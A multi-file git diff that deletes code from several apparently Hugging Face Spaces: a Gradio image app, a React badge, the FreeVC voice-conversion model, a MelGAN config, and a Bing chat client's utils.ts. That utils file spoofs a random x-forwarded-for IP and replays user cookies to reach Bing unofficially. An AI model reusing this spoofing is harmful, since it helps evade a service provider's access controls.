f"models/{model['url']}" - loaded_model = gr.Interface.load(model_url, live=True, preprocess=True) - models2.append(loaded_model) - - -def text_it(inputs, text_gen=text_gen): - return text_gen(inputs) - - -def set_model(current_model_index): - global current_model - current_model = models[current_model_index] - return gr.update(value=f"{current_model['name']}") - - -def send_it(inputs, model_choice): - proc = models2[model_choice] - return proc(inputs) - - -with gr.Blocks() as myface: - gr.HTML( - - ) - - with gr.Row(): - with gr.Row(): - input_text = gr.Textbox(label="Prompt idea", placeholder="Eg. Fantasy sunrise, serene", lines=1) - # Model selection dropdown - model_name1 = gr.Dropdown( - label="Choose Model", - choices=[m["name"] for m in models], - type="index", - value=current_model["name"], - interactive=True, - ) - with gr.Row(): - see_prompts = gr.Button("Generate Prompts") - run = gr.Button("Generate Images", variant="primary") - - with gr.Row(): - output1 = gr.Image(label="") - output2 = gr.Image(label="") - output3 = gr.Image(label="") - with gr.Row(): - magic1 = gr.Textbox(label="Generated Prompt", lines=2) - magic2 = gr.Textbox(label="Generated Prompt", lines=2) - magic3 = gr.Textbox(label="Generated Prompt", lines=2) - with gr.Row(): - output4 = gr.Image(label="") - output5 = gr.Image(label="") - output6 = gr.Image(label="") - with gr.Row(): - magic4 = gr.Textbox(label="Generated Prompt", lines=2) - magic5 = gr.Textbox(label="Generated Prompt", lines=2) - magic6 = gr.Textbox(label="Generated Prompt", lines=2) - - model_name1.change(set_model, inputs=model_name1, outputs=[output1, output2, output3, output4, output5, output6]) - - run.click(send_it, inputs=[magic1, model_name1], outputs=[output1]) - run.click(send_it, inputs=[magic2, model_name1], outputs=[output2]) - run.click(send_it, inputs=[magic3, model_name1], outputs=[output3]) - run.click(send_it, inputs=[magic4, model_name1], outputs=[output4]) - run.click(send_it, inputs=[magic5, model_name1], outputs=[output5]) - run.click(send_it, inputs=[magic6, model_name1], outputs=[output6]) - - see_prompts.click(text_it, inputs=[input_text], outputs=[magic1]) - see_prompts.click(text_it, inputs=[input_text], outputs=[magic2]) - see_prompts.click(text_it, inputs=[input_text], outputs=[magic3]) - see_prompts.click(text_it, inputs=[input_text], outputs=[magic4]) - see_prompts.click(text_it, inputs=[input_text], outputs=[magic5]) - see_prompts.click(text_it, inputs=[input_text], outputs=[magic6]) - -myface.queue(concurrency_count=200) -myface.launch(inline=True, show_api=False, max_threads=400) \ No newline at end of file diff --git a/spaces/aphenx/bingo/src/components/ui/badge.tsx b/spaces/aphenx/bingo/src/components/ui/badge.tsx deleted file mode 100644 index d9a84b394090e5b4b3bd34f6135b9a2f2ead0aa2..0000000000000000000000000000000000000000 --- a/spaces/aphenx/bingo/src/components/ui/badge.tsx +++ /dev/null @@ -1,36 +0,0 @@ -import * as React from 'react' -import { cva, type VariantProps } from 'class-variance-authority' - -import { cn } from '@/lib/utils' - -const badgeVariants = cva( - 'inline-flex items-center rounded-full border px-2.5 py-0.5 text-xs font-semibold transition-colors focus:outline-none focus:ring-2 focus:ring-ring focus:ring-offset-2', - { - variants: { - variant: { - default: - 'border-transparent bg-primary text-primary-foreground hover:bg-primary/80', - secondary: - 'border-transparent bg-secondary text-secondary-foreground hover:bg-secondary/80', - destructive: - 'border-transparent bg-destructive text-destructive-foreground hover:bg-destructive/80', - outline: 'text-foreground' - } - }, - defaultVariants: { - variant: 'default' - } - } -) - -export interface BadgeProps - extends React.HTMLAttributes, - VariantProps {} - -function Badge({ className, variant, ...props }: BadgeProps) { - return ( -
    - ) -} - -export { Badge, badgeVariants } diff --git a/spaces/aphenx/bingo/src/lib/utils.ts b/spaces/aphenx/bingo/src/lib/utils.ts deleted file mode 100644 index 07feedb34e356b1b3cf867872f32d47a96ae12fb..0000000000000000000000000000000000000000 --- a/spaces/aphenx/bingo/src/lib/utils.ts +++ /dev/null @@ -1,138 +0,0 @@ -import { clsx, type ClassValue } from 'clsx' -import { customAlphabet } from 'nanoid' -import { twMerge } from 'tailwind-merge' - -export function cn(...inputs: ClassValue[]) { - return twMerge(clsx(inputs)) -} - -export const nanoid = customAlphabet( - '0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz', - 7 -) // 7-character random string - -export function createChunkDecoder() { - const decoder = new TextDecoder() - return function (chunk: Uint8Array | undefined): string { - if (!chunk) return '' - return decoder.decode(chunk, { stream: true }) - } -} - -export function random (start: number, end: number) { - return start + Math.ceil(Math.random() * (end - start)) -} - -export function randomIP() { - return `11.${random(104, 107)}.${random(1, 255)}.${random(1, 255)}` -} - -export function parseHeadersFromCurl(content: string) { - const re = /-H '([^:]+):\s*([^']+)/mg - const headers: HeadersInit = {} - content = content.replaceAll('-H "', '-H \'').replaceAll('" ^', '\'\\').replaceAll('^\\^"', '"') // 将 cmd curl 转成 bash curl - content.replace(re, (_: string, key: string, value: string) => { - headers[key] = value - return '' - }) - - return headers -} - -export const ChunkKeys = ['BING_HEADER', 'BING_HEADER1', 'BING_HEADER2'] -export function encodeHeadersToCookie(content: string) { - const base64Content = btoa(content) - const contentChunks = base64Content.match(/.{1,4000}/g) || [] - return ChunkKeys.map((key, index) => `${key}=${contentChunks[index] ?? ''}`) -} - -export function extraCurlFromCookie(cookies: Partial<{ [key: string]: string }>) { - let base64Content = '' - ChunkKeys.forEach((key) => { - base64Content += (cookies[key] || '') - }) - try { - return atob(base64Content) - } catch(e) { - return '' - } -} - -export function extraHeadersFromCookie(cookies: Partial<{ [key: string]: string }>) { - return parseHeadersFromCurl(extraCurlFromCookie(cookies)) -} - -export function formatDate(input: string | number | Date): string { - const date = new Date(input) - return date.toLocaleDateString('en-US', { - month: 'long', - day: 'numeric', - year: 'numeric' - }) -} - -export function parseCookie(cookie: string, cookieName: string) { - const targetCookie = new RegExp(`(?:[; ]|^)${cookieName}=([^;]*)`).test(cookie) ? RegExp.$1 : cookie - return targetCookie ? decodeURIComponent(targetCookie).trim() : cookie.indexOf('=') === -1 ? cookie.trim() : '' -} - -export function parseCookies(cookie: string, cookieNames: string[]) { - const cookies: { [key: string]: string } = {} - cookieNames.forEach(cookieName => { - cookies[cookieName] = parseCookie(cookie, cookieName) - }) - return cookies -} - -export const DEFAULT_UA = 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.0.0 Safari/537.36 Edg/115.0.0.0' -export const DEFAULT_IP = process.env.BING_IP || randomIP() - -export function parseUA(ua?: string, default_ua = DEFAULT_UA) { - return / EDGE?/i.test(decodeURIComponent(ua || '')) ? decodeURIComponent(ua!.trim()) : default_ua -} - -export function createHeaders(cookies: Partial<{ [key: string]: string }>, defaultHeaders?: Partial<{ [key: string]: string }>) { - let { - BING_COOKIE = process.env.BING_COOKIE, - BING_UA = process.env.BING_UA, - BING_IP = process.env.BING_IP, - BING_HEADER = process.env.BING_HEADER, - } = cookies - - if (BING_HEADER) { - return extraHeadersFromCookie({ - BING_HEADER, - ...cookies, - }) - } - - const ua = parseUA(BING_UA) - - if (!BING_COOKIE) { - BING_COOKIE = defaultHeaders?.IMAGE_BING_COOKIE || 'xxx' // hf 暂时不用 Cookie 也可以正常使用 - } - - const parsedCookie = parseCookie(BING_COOKIE, '_U') - if (!parsedCookie) { - throw new Error('Invalid Cookie') - } - return { - 'x-forwarded-for': BING_IP || DEFAULT_IP, - 'Accept-Encoding': 'gzip, deflate, br', - 'Accept-Language': 'zh-CN,zh;q=0.9,en;q=0.8,en-GB;q=0.7,en-US;q=0.6', - 'User-Agent': ua!, - 'x-ms-useragent': 'azsdk-js-api-client-factory/1.0.0-beta.1 core-rest-pipeline/1.10.0 OS/Win32', - cookie: `_U=${parsedCookie}` || '', - } -} - -export class WatchDog { - private tid = 0 - watch(fn: Function, timeout = 2000) { - clearTimeout(this.tid) - this.tid = setTimeout(fn, timeout + Math.random() * 1000) - } - reset() { - clearTimeout(this.tid) - } -} diff --git a/spaces/artificialguybr/video-dubbing/TTS/TTS/vc/models/freevc.py b/spaces/artificialguybr/video-dubbing/TTS/TTS/vc/models/freevc.py deleted file mode 100644 index fd53a77fc5c5288883ce329c60114e13569e7126..0000000000000000000000000000000000000000 --- a/spaces/artificialguybr/video-dubbing/TTS/TTS/vc/models/freevc.py +++ /dev/null @@ -1,560 +0,0 @@ -from typing import Dict, List, Optional, Tuple, Union - -import librosa -import numpy as np -import torch -from coqpit import Coqpit -from torch import nn -from torch.nn import AvgPool1d, Conv1d, Conv2d, ConvTranspose1d -from torch.nn import functional as F -from torch.nn.utils import remove_weight_norm, spectral_norm, weight_norm - -import TTS.vc.modules.freevc.commons as commons -import TTS.vc.modules.freevc.modules as modules -from TTS.tts.utils.speakers import SpeakerManager -from TTS.utils.io import load_fsspec -from TTS.vc.configs.freevc_config import FreeVCConfig -from TTS.vc.models.base_vc import BaseVC -from TTS.vc.modules.freevc.commons import get_padding, init_weights -from TTS.vc.modules.freevc.mel_processing import mel_spectrogram_torch -from TTS.vc.modules.freevc.speaker_encoder.speaker_encoder import SpeakerEncoder as SpeakerEncoderEx -from TTS.vc.modules.freevc.wavlm import get_wavlm - - -class ResidualCouplingBlock(nn.Module): - def __init__(self, channels, hidden_channels, kernel_size, dilation_rate, n_layers, n_flows=4, gin_channels=0): - super().__init__() - self.channels = channels - self.hidden_channels = hidden_channels - self.kernel_size = kernel_size - self.dilation_rate = dilation_rate - self.n_layers = n_layers - self.n_flows = n_flows - self.gin_channels = gin_channels - - self.flows = nn.ModuleList() - for i in range(n_flows): - self.flows.append( - modules.ResidualCouplingLayer( - channels, - hidden_channels, - kernel_size, - dilation_rate, - n_layers, - gin_channels=gin_channels, - mean_only=True, - ) - ) - self.flows.append(modules.Flip()) - - def forward(self, x, x_mask, g=None, reverse=False): - if not reverse: - for flow in self.flows: - x, _ = flow(x, x_mask, g=g, reverse=reverse) - else: - for flow in reversed(self.flows): - x = flow(x, x_mask, g=g, reverse=reverse) - return x - - -class Encoder(nn.Module): - def __init__( - self, in_channels, out_channels, hidden_channels, kernel_size, dilation_rate, n_layers, gin_channels=0 - ): - super().__init__() - self.in_channels = in_channels - self.out_channels = out_channels - self.hidden_channels = hidden_channels - self.kernel_size = kernel_size - self.dilation_rate = dilation_rate - self.n_layers = n_layers - self.gin_channels = gin_channels - - self.pre = nn.Conv1d(in_channels, hidden_channels, 1) - self.enc = modules.WN(hidden_channels, kernel_size, dilation_rate, n_layers, gin_channels=gin_channels) - self.proj = nn.Conv1d(hidden_channels, out_channels * 2, 1) - - def forward(self, x, x_lengths, g=None): - x_mask = torch.unsqueeze(commons.sequence_mask(x_lengths, x.size(2)), 1).to(x.dtype) - x = self.pre(x) * x_mask - x = self.enc(x, x_mask, g=g) - stats = self.proj(x) * x_mask - m, logs = torch.split(stats, self.out_channels, dim=1) - z = (m + torch.randn_like(m) * torch.exp(logs)) * x_mask - return z, m, logs, x_mask - - -class Generator(torch.nn.Module): - def __init__( - self, - initial_channel, - resblock, - resblock_kernel_sizes, - resblock_dilation_sizes, - upsample_rates, - upsample_initial_channel, - upsample_kernel_sizes, - gin_channels=0, - ): - super(Generator, self).__init__() - self.num_kernels = len(resblock_kernel_sizes) - self.num_upsamples = len(upsample_rates) - self.conv_pre = Conv1d(initial_channel, upsample_initial_channel, 7, 1, padding=3) - resblock = modules.ResBlock1 if resblock == "1" else modules.ResBlock2 - - self.ups = nn.ModuleList() - for i, (u, k) in enumerate(zip(upsample_rates, upsample_kernel_sizes)): - self.ups.append( - weight_norm( - ConvTranspose1d( - upsample_initial_channel // (2**i), - upsample_initial_channel // (2 ** (i + 1)), - k, - u, - padding=(k - u) // 2, - ) - ) - ) - - self.resblocks = nn.ModuleList() - for i in range(len(self.ups)): - ch = upsample_initial_channel // (2 ** (i + 1)) - for j, (k, d) in enumerate(zip(resblock_kernel_sizes, resblock_dilation_sizes)): - self.resblocks.append(resblock(ch, k, d)) - - self.conv_post = Conv1d(ch, 1, 7, 1, padding=3, bias=False) - self.ups.apply(init_weights) - - if gin_channels != 0: - self.cond = nn.Conv1d(gin_channels, upsample_initial_channel, 1) - - def forward(self, x, g=None): - x = self.conv_pre(x) - if g is not None: - x = x + self.cond(g) - - for i in range(self.num_upsamples): - x = F.leaky_relu(x, modules.LRELU_SLOPE) - x = self.ups[i](x) - xs = None - for j in range(self.num_kernels): - if xs is None: - xs = self.resblocks[i * self.num_kernels + j](x) - else: - xs += self.resblocks[i * self.num_kernels + j](x) - x = xs / self.num_kernels - x = F.leaky_relu(x) - x = self.conv_post(x) - x = torch.tanh(x) - - return x - - def remove_weight_norm(self): - print("Removing weight norm...") - for l in self.ups: - remove_weight_norm(l) - for l in self.resblocks: - l.remove_weight_norm() - - -class DiscriminatorP(torch.nn.Module): - def __init__(self, period, kernel_size=5, stride=3, use_spectral_norm=False): - super(DiscriminatorP, self).__init__() - self.period = period - self.use_spectral_norm = use_spectral_norm - norm_f = weight_norm if use_spectral_norm == False else spectral_norm - self.convs = nn.ModuleList( - [ - norm_f(Conv2d(1, 32, (kernel_size, 1), (stride, 1), padding=(get_padding(kernel_size, 1), 0))), - norm_f(Conv2d(32, 128, (kernel_size, 1), (stride, 1), padding=(get_padding(kernel_size, 1), 0))), - norm_f(Conv2d(128, 512, (kernel_size, 1), (stride, 1), padding=(get_padding(kernel_size, 1), 0))), - norm_f(Conv2d(512, 1024, (kernel_size, 1), (stride, 1), padding=(get_padding(kernel_size, 1), 0))), - norm_f(Conv2d(1024, 1024, (kernel_size, 1), 1, padding=(get_padding(kernel_size, 1), 0))), - ] - ) - self.conv_post = norm_f(Conv2d(1024, 1, (3, 1), 1, padding=(1, 0))) - - def forward(self, x): - fmap = [] - - # 1d to 2d - b, c, t = x.shape - if t % self.period != 0: # pad first - n_pad = self.period - (t % self.period) - x = F.pad(x, (0, n_pad), "reflect") - t = t + n_pad - x = x.view(b, c, t // self.period, self.period) - - for l in self.convs: - x = l(x) - x = F.leaky_relu(x, modules.LRELU_SLOPE) - fmap.append(x) - x = self.conv_post(x) - fmap.append(x) - x = torch.flatten(x, 1, -1) - - return x, fmap - - -class DiscriminatorS(torch.nn.Module): - def __init__(self, use_spectral_norm=False): - super(DiscriminatorS, self).__init__() - norm_f = weight_norm if use_spectral_norm == False else spectral_norm - self.convs = nn.ModuleList( - [ - norm_f(Conv1d(1, 16, 15, 1, padding=7)), - norm_f(Conv1d(16, 64, 41, 4, groups=4, padding=20)), - norm_f(Conv1d(64, 256, 41, 4, groups=16, padding=20)), - norm_f(Conv1d(256, 1024, 41, 4, groups=64, padding=20)), - norm_f(Conv1d(1024, 1024, 41, 4, groups=256, padding=20)), - norm_f(Conv1d(1024, 1024, 5, 1, padding=2)), - ] - ) - self.conv_post = norm_f(Conv1d(1024, 1, 3, 1, padding=1)) - - def forward(self, x): - fmap = [] - - for l in self.convs: - x = l(x) - x = F.leaky_relu(x, modules.LRELU_SLOPE) - fmap.append(x) - x = self.conv_post(x) - fmap.append(x) - x = torch.flatten(x, 1, -1) - - return x, fmap - - -class MultiPeriodDiscriminator(torch.nn.Module): - def __init__(self, use_spectral_norm=False): - super(MultiPeriodDiscriminator, self).__init__() - periods = [2, 3, 5, 7, 11] - - discs = [DiscriminatorS(use_spectral_norm=use_spectral_norm)] - discs = discs + [DiscriminatorP(i, use_spectral_norm=use_spectral_norm) for i in periods] - self.discriminators = nn.ModuleList(discs) - - def forward(self, y, y_hat): - y_d_rs = [] - y_d_gs = [] - fmap_rs = [] - fmap_gs = [] - for i, d in enumerate(self.discriminators): - y_d_r, fmap_r = d(y) - y_d_g, fmap_g = d(y_hat) - y_d_rs.append(y_d_r) - y_d_gs.append(y_d_g) - fmap_rs.append(fmap_r) - fmap_gs.append(fmap_g) - - return y_d_rs, y_d_gs, fmap_rs, fmap_gs - - -class SpeakerEncoder(torch.nn.Module): - def __init__(self, mel_n_channels=80, model_num_layers=3, model_hidden_size=256, model_embedding_size=256): - super(SpeakerEncoder, self).__init__() - self.lstm = nn.LSTM(mel_n_channels, model_hidden_size, model_num_layers, batch_first=True) - self.linear = nn.Linear(model_hidden_size, model_embedding_size) - self.relu = nn.ReLU() - - def forward(self, mels): - self.lstm.flatten_parameters() - _, (hidden, _) = self.lstm(mels) - embeds_raw = self.relu(self.linear(hidden[-1])) - return embeds_raw / torch.norm(embeds_raw, dim=1, keepdim=True) - - def compute_partial_slices(self, total_frames, partial_frames, partial_hop): - mel_slices = [] - for i in range(0, total_frames - partial_frames, partial_hop): - mel_range = torch.arange(i, i + partial_frames) - mel_slices.append(mel_range) - - return mel_slices - - def embed_utterance(self, mel, partial_frames=128, partial_hop=64): - mel_len = mel.size(1) - last_mel = mel[:, -partial_frames:] - - if mel_len > partial_frames: - mel_slices = self.compute_partial_slices(mel_len, partial_frames, partial_hop) - mels = list(mel[:, s] for s in mel_slices) - mels.append(last_mel) - mels = torch.stack(tuple(mels), 0).squeeze(1) - - with torch.no_grad(): - partial_embeds = self(mels) - embed = torch.mean(partial_embeds, axis=0).unsqueeze(0) - # embed = embed / torch.linalg.norm(embed, 2) - else: - with torch.no_grad(): - embed = self(last_mel) - - return embed - - -class FreeVC(BaseVC): - """ - - Papaer:: - https://arxiv.org/abs/2210.15418# - - Paper Abstract:: - Voice conversion (VC) can be achieved by first extracting source content information and target speaker - information, and then reconstructing waveform with these information. However, current approaches normally - either extract dirty content information with speaker information leaked in, or demand a large amount of - annotated data for training. Besides, the quality of reconstructed waveform can be degraded by the - mismatch between conversion model and vocoder. In this paper, we adopt the end-to-end framework of VITS for - high-quality waveform reconstruction, and propose strategies for clean content information extraction without - text annotation. We disentangle content information by imposing an information bottleneck to WavLM features, - and propose the spectrogram-resize based data augmentation to improve the purity of extracted content - information. Experimental results show that the proposed method outperforms the latest VC models trained with - annotated data and has greater robustness. - - Original Code:: - https://github.com/OlaWod/FreeVC - - Examples: - >>> from TTS.vc.configs.freevc_config import FreeVCConfig - >>> from TTS.vc.models.freevc import FreeVC - >>> config = FreeVCConfig() - >>> model = FreeVC(config) - """ - - def __init__(self, config: Coqpit, speaker_manager: SpeakerManager = None): - super().__init__(config, None, speaker_manager, None) - - self.init_multispeaker(config) - - self.spec_channels = self.args.spec_channels - self.inter_channels = self.args.inter_channels - self.hidden_channels = self.args.hidden_channels - self.filter_channels = self.args.filter_channels - self.n_heads = self.args.n_heads - self.n_layers = self.args.n_layers - self.kernel_size = self.args.kernel_size - self.p_dropout = self.args.p_dropout - self.resblock = self.args.resblock - self.resblock_kernel_sizes = self.args.resblock_kernel_sizes - self.resblock_dilation_sizes = self.args.resblock_dilation_sizes - self.upsample_rates = self.args.upsample_rates - self.upsample_initial_channel = self.args.upsample_initial_channel - self.upsample_kernel_sizes = self.args.upsample_kernel_sizes - self.segment_size = self.args.segment_size - self.gin_channels = self.args.gin_channels - self.ssl_dim = self.args.ssl_dim - self.use_spk = self.args.use_spk - - self.enc_p = Encoder(self.args.ssl_dim, self.inter_channels, self.hidden_channels, 5, 1, 16) - self.dec = Generator( - self.inter_channels, - self.resblock, - self.resblock_kernel_sizes, - self.resblock_dilation_sizes, - self.upsample_rates, - self.upsample_initial_channel, - self.upsample_kernel_sizes, - gin_channels=self.gin_channels, - ) - self.enc_q = Encoder( - self.spec_channels, self.inter_channels, self.hidden_channels, 5, 1, 16, gin_channels=self.gin_channels - ) - self.flow = ResidualCouplingBlock( - self.inter_channels, self.hidden_channels, 5, 1, 4, gin_channels=self.gin_channels - ) - if not self.use_spk: - self.enc_spk = SpeakerEncoder(model_hidden_size=self.gin_channels, model_embedding_size=self.gin_channels) - else: - self.load_pretrained_speaker_encoder() - - self.wavlm = get_wavlm() - - @property - def device(self): - return next(self.parameters()).device - - def load_pretrained_speaker_encoder(self): - """Load pretrained speaker encoder model as mentioned in the paper.""" - print(" > Loading pretrained speaker encoder model ...") - self.enc_spk_ex = SpeakerEncoderEx( - "https://github.com/coqui-ai/TTS/releases/download/v0.13.0_models/speaker_encoder.pt" - ) - - def init_multispeaker(self, config: Coqpit): - """Initialize multi-speaker modules of a model. A model can be trained either with a speaker embedding layer - or with external `d_vectors` computed from a speaker encoder model. - - You must provide a `speaker_manager` at initialization to set up the multi-speaker modules. - - Args: - config (Coqpit): Model configuration. - data (List, optional): Dataset items to infer number of speakers. Defaults to None. - """ - self.num_spks = self.args.num_spks - if self.speaker_manager: - self.num_spks = self.speaker_manager.num_spks - - def forward( - self, - c: torch.Tensor, - spec: torch.Tensor, - g: Optional[torch.Tensor] = None, - mel: Optional[torch.Tensor] = None, - c_lengths: Optional[torch.Tensor] = None, - spec_lengths: Optional[torch.Tensor] = None, - ) -> Tuple[ - torch.Tensor, - torch.Tensor, - torch.Tensor, - Tuple[torch.Tensor, torch.Tensor, torch.Tensor, torch.Tensor, torch.Tensor, torch.Tensor], - ]: - """ - Forward pass of the model. - - Args: - c: WavLM features. Shape: (batch_size, c_seq_len). - spec: The input spectrogram. Shape: (batch_size, spec_seq_len, spec_dim). - g: The speaker embedding. Shape: (batch_size, spk_emb_dim). - mel: The input mel-spectrogram for the speaker encoder. Shape: (batch_size, mel_seq_len, mel_dim). - c_lengths: The lengths of the WavLM features. Shape: (batch_size,). - spec_lengths: The lengths of the spectrogram. Shape: (batch_size,). - - Returns: - o: The output spectrogram. Shape: (batch_size, spec_seq_len, spec_dim). - ids_slice: The slice indices. Shape: (batch_size, num_slices). - spec_mask: The spectrogram mask. Shape: (batch_size, spec_seq_len). - (z, z_p, m_p, logs_p, m_q, logs_q): A tuple of latent variables. - """ - - # If c_lengths is None, set it to the length of the last dimension of c - if c_lengths is None: - c_lengths = (torch.ones(c.size(0)) * c.size(-1)).to(c.device) - - # If spec_lengths is None, set it to the length of the last dimension of spec - if spec_lengths is None: - spec_lengths = (torch.ones(spec.size(0)) * spec.size(-1)).to(spec.device) - - # If use_spk is False, compute g from mel using enc_spk - g = None - if not self.use_spk: - g = self.enc_spk(mel).unsqueeze(-1) - - # Compute m_p, logs_p, z, m_q, logs_q, and spec_mask using enc_p and enc_q - _, m_p, logs_p, _ = self.enc_p(c, c_lengths) - z, m_q, logs_q, spec_mask = self.enc_q(spec.transpose(1, 2), spec_lengths, g=g) - - # Compute z_p using flow - z_p = self.flow(z, spec_mask, g=g) - - # Randomly slice z and compute o using dec - z_slice, ids_slice = commons.rand_slice_segments(z, spec_lengths, self.segment_size) - o = self.dec(z_slice, g=g) - - return o, ids_slice, spec_mask, (z, z_p, m_p, logs_p, m_q, logs_q) - - @torch.no_grad() - def inference(self, c, g=None, mel=None, c_lengths=None): - """ - Inference pass of the model - - Args: - c (torch.Tensor): Input tensor. Shape: (batch_size, c_seq_len). - g (torch.Tensor): Speaker embedding tensor. Shape: (batch_size, spk_emb_dim). - mel (torch.Tensor): Mel-spectrogram tensor. Shape: (batch_size, mel_seq_len, mel_dim). - c_lengths (torch.Tensor): Lengths of the input tensor. Shape: (batch_size,). - - Returns: - torch.Tensor: Output tensor. - """ - if c_lengths == None: - c_lengths = (torch.ones(c.size(0)) * c.size(-1)).to(c.device) - if not self.use_spk: - g = self.enc_spk.embed_utterance(mel) - g = g.unsqueeze(-1) - z_p, m_p, logs_p, c_mask = self.enc_p(c, c_lengths) - z = self.flow(z_p, c_mask, g=g, reverse=True) - o = self.dec(z * c_mask, g=g) - return o - - def extract_wavlm_features(self, y): - """Extract WavLM features from an audio tensor. - - Args: - y (torch.Tensor): Audio tensor. Shape: (batch_size, audio_seq_len). - """ - - with torch.no_grad(): - c = self.wavlm.extract_features(y)[0] - c = c.transpose(1, 2) - return c - - def load_audio(self, wav): - """Read and format the input audio.""" - if isinstance(wav, str): - wav, _ = librosa.load(wav, sr=self.config.audio.input_sample_rate) - if isinstance(wav, np.ndarray): - wav = torch.from_numpy(wav).to(self.device) - if isinstance(wav, torch.Tensor): - wav = wav.to(self.device) - if isinstance(wav, list): - wav = torch.from_numpy(np.array(wav)).to(self.device) - return wav.float() - - @torch.inference_mode() - def voice_conversion(self, src, tgt): - """ - Voice conversion pass of the model. - - Args: - src (str or torch.Tensor): Source utterance. - tgt (str or torch.Tensor): Target utterance. - - Returns: - torch.Tensor: Output tensor. - """ - - wav_tgt = self.load_audio(tgt).cpu().numpy() - wav_tgt, _ = librosa.effects.trim(wav_tgt, top_db=20) - - if self.config.model_args.use_spk: - g_tgt = self.enc_spk_ex.embed_utterance(wav_tgt) - g_tgt = torch.from_numpy(g_tgt)[None, :, None].to(self.device) - else: - wav_tgt = torch.from_numpy(wav_tgt).unsqueeze(0).to(self.device) - mel_tgt = mel_spectrogram_torch( - wav_tgt, - self.config.audio.filter_length, - self.config.audio.n_mel_channels, - self.config.audio.input_sample_rate, - self.config.audio.hop_length, - self.config.audio.win_length, - self.config.audio.mel_fmin, - self.config.audio.mel_fmax, - ) - # src - wav_src = self.load_audio(src) - c = self.extract_wavlm_features(wav_src[None, :]) - - if self.config.model_args.use_spk: - audio = self.inference(c, g=g_tgt) - else: - audio = self.inference(c, mel=mel_tgt.transpose(1, 2)) - audio = audio[0][0].data.cpu().float().numpy() - return audio - - def eval_step(): - ... - - @staticmethod - def init_from_config(config: FreeVCConfig, samples: Union[List[List], List[Dict]] = None, verbose=True): - model = FreeVC(config) - return model - - def load_checkpoint(self, config, checkpoint_path, eval=False, strict=True, cache=False): - state = load_fsspec(checkpoint_path, map_location=torch.device("cpu"), cache=cache) - self.load_state_dict(state["model"], strict=strict) - if eval: - self.eval() - - def train_step(): - ... diff --git a/spaces/artificialguybr/video-dubbing/TTS/TTS/vocoder/configs/melgan_config.py b/spaces/artificialguybr/video-dubbing/TTS/TTS/vocoder/configs/melgan_config.py deleted file mode 100644 index dc35b6f8b70891d4904baefad802d9c62fe67925..0000000000000000000000000000000000000000 --- a/spaces/artificialguybr/video-dubbing/TTS/TTS/vocoder/configs/melgan_config.py +++ /dev/null @@ -1,106 +0,0 @@ -from dataclasses import dataclass, field - -from TTS.vocoder.configs.shared_configs import BaseGANVocoderConfig - - -@dataclass -class MelganConfig(BaseGANVocoderConfig): - """Defines parameters for MelGAN vocoder. - - Example: - - >>> from TTS.vocoder.configs import MelganConfig - >>> config = MelganConfig() - - Args: - model (str): - Model name used for selecting the right model at initialization. Defaults to `melgan`. - discriminator_model (str): One of the discriminators from `TTS.vocoder.models.*_discriminator`. Defaults to - 'melgan_multiscale_discriminator`. - discriminator_model_params (dict): The discriminator model parameters. Defaults to - '{"base_channels": 16, "max_channels": 1024, "downsample_factors": [4, 4, 4, 4]}` - generator_model (str): One of the generators from TTS.vocoder.models.*`. Every other non-GAN vocoder model is - considered as a generator too. Defaults to `melgan_generator`. - batch_size (int): - Batch size used at training. Larger values use more memory. Defaults to 16. - seq_len (int): - Audio segment length used at training. Larger values use more memory. Defaults to 8192. - pad_short (int): - Additional padding applied to the audio samples shorter than `seq_len`. Defaults to 0. - use_noise_augment (bool): - enable / disable random noise added to the input waveform. The noise is added after computing the - features. Defaults to True. - use_cache (bool): - enable / disable in memory caching of the computed features. It can cause OOM error if the system RAM is - not large enough. Defaults to True. - use_stft_loss (bool): - enable / disable use of STFT loss originally used by ParallelWaveGAN model. Defaults to True. - use_subband_stft (bool): - enable / disable use of subband loss computation originally used by MultiBandMelgan model. Defaults to True. - use_mse_gan_loss (bool): - enable / disable using Mean Squeare Error GAN loss. Defaults to True. - use_hinge_gan_loss (bool): - enable / disable using Hinge GAN loss. You should choose either Hinge or MSE loss for training GAN models. - Defaults to False. - use_feat_match_loss (bool): - enable / disable using Feature Matching loss originally used by MelGAN model. Defaults to True. - use_l1_spec_loss (bool): - enable / disable using L1 spectrogram loss originally used by HifiGAN model. Defaults to False. - stft_loss_params (dict): STFT loss parameters. Default to - `{"n_ffts": [1024, 2048, 512], "hop_lengths": [120, 240, 50], "win_lengths": [600, 1200, 240]}` - stft_loss_weight (float): STFT loss weight that multiplies the computed loss before summing up the total - model loss. Defaults to 0.5. - subband_stft_loss_weight (float): - Subband STFT loss weight that multiplies the computed loss before summing up the total loss. Defaults to 0. - mse_G_loss_weight (float): - MSE generator loss weight that multiplies the computed loss before summing up the total loss. faults to 2.5. - hinge_G_loss_weight (float): - Hinge generator loss weight that multiplies the computed loss before summing up the total loss. Defaults to 0. - feat_match_loss_weight (float): - Feature matching loss weight that multiplies the computed loss before summing up the total loss. faults to 108. - l1_spec_loss_weight (float): - L1 spectrogram loss weight that multiplies the computed loss before summing up the total loss. Defaults to 0. - """ - - model: str = "melgan" - - # Model specific params - discriminator_model: str = "melgan_multiscale_discriminator" - discriminator_model_params: dict = field( - default_factory=lambda: {"base_channels": 16, "max_channels": 1024, "downsample_factors": [4, 4, 4, 4]} - ) - generator_model: str = "melgan_generator" - generator_model_params: dict = field( - default_factory=lambda: {"upsample_factors": [8, 8, 2, 2], "num_res_blocks": 3} - ) - - # Training - overrides - batch_size: int = 16 - seq_len: int = 8192 - pad_short: int = 2000 - use_noise_augment: bool = True - use_cache: bool = True - - # LOSS PARAMETERS - overrides - use_stft_loss: bool = True - use_subband_stft_loss: bool = False - use_mse_gan_loss: bool = True - use_hinge_gan_loss: bool = False - use_feat_match_loss: bool = True # requires MelGAN Discriminators (MelGAN and HifiGAN) - use_l1_spec_loss: bool = False - - stft_loss_params: dict = field( - default_factory=lambda: { - "n_ffts": [1024, 2048, 512], - "hop_lengths": [120, 240, 50], - "win_lengths": [600, 1200, 240], - } - ) - - # loss weights - overrides - stft_loss_weight: float = 0.5 - subband_stft_loss_weight: float = 0 - mse_G_loss_weight: float = 2.5 - hinge_G_loss_weight: float = 0 - feat_match_loss_weight: float = 108 - l1_spec_loss_weight: float = 0 diff --git a/spaces/arxify/RVC-beta-v2-0618/runtime/Lib/site-packages/Crypto/SelfTest/Cipher/test_ChaCha20_Poly1305.py 